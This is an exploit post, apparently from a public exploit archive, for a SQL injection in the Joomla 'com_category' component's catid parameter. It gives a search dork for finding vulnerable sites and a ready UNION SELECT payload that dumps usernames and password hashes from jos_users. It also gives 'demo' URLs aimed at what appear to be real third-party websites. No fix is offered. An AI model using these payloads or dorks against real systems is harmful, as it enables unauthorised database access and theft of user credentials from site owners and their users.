Joomla Component com_category (catid) SQL Injection Vulnerability

2009-07-11 21:02:09

###############################################################
# #
# Joomla component 'com_category' SQL injection vulnerability #
###############################################################
# ######## #
#dork:inurl:"com_category"
# ######## #
# xploited by Prince_Pwn3r #
# ######## #
# contact: [email protected] #
###############################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------

Vulnerable joomla component : com_category
vulnerable parameter: "edit" ($_GET)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploit :


http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Demos :

http://www.p.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
or
http://ndsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

*could be different (eg: view&color=3&cat_id=)

#

Fixes

No fixes

In order to submit a new fix you need to be registered.